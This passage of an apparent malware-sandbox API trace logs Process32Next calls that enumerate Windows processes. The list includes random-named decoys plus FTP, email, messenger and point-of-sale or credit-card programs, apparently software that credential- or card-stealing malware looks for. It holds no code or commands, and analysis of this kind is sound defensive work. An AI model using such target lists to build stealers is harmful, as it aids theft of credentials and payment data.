th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.835] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.837] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.838] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.840] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.849] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.850] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.854] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.855] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.857] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.858] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.860] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.861] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.863] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0192.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.867] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.870] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.871] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.873] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.875] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.876] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.878] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.880] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0192.881] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0192.883] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0192.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0192.891] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0192.892] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0192.894] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0192.896] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0192.897] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0192.899] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0192.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0192.902] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0192.904] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0192.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0192.907] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0192.908] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0192.911] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0192.913] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0192.914] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0192.916] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0192.917] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0192.919] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0192.921] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0192.922] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0192.924] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0192.926] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0192.929] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0192.931] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0192.939] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0192.941] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0192.943] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0192.945] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0192.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0192.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.955] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.957] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.960] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.962] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.964] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.966] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.968] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.970] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.971] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.973] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.975] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.977] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.979] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.981] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.983] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.984] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.987] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.989] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.992] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.994] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.996] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | 